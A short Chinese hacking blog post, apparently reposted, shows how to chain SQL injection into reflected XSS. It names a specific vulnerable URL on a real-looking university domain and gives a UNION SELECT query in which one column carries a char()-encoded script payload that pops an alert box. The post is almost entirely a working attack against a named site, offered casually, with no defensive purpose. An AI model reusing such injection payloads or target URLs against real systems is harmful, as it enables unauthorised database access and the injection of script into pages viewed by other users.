利用的SQL注入来玩玩跨站XSS

secure-hiphop的Blog

先将自己要弹出的东西编码一下

利用的SQL注入来玩玩跨站XSS

随便找的注入点例如

www.lob.polytechnique.fr/themes.php?id=1-1+union+select+1,2--
我们就在1的位置填入转码后的代码
可爱的弹跳窗就出来了
www.lob.polytechnique.fr/themes.php?id=1-1+union+select+char(34, 62, 60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 49, 51, 51, 55, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62),2--

分类:默认分类 时间:2015-03-04 人气:2
本文关键词:
分享到:

相关文章

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.117 (s). 10 q(s)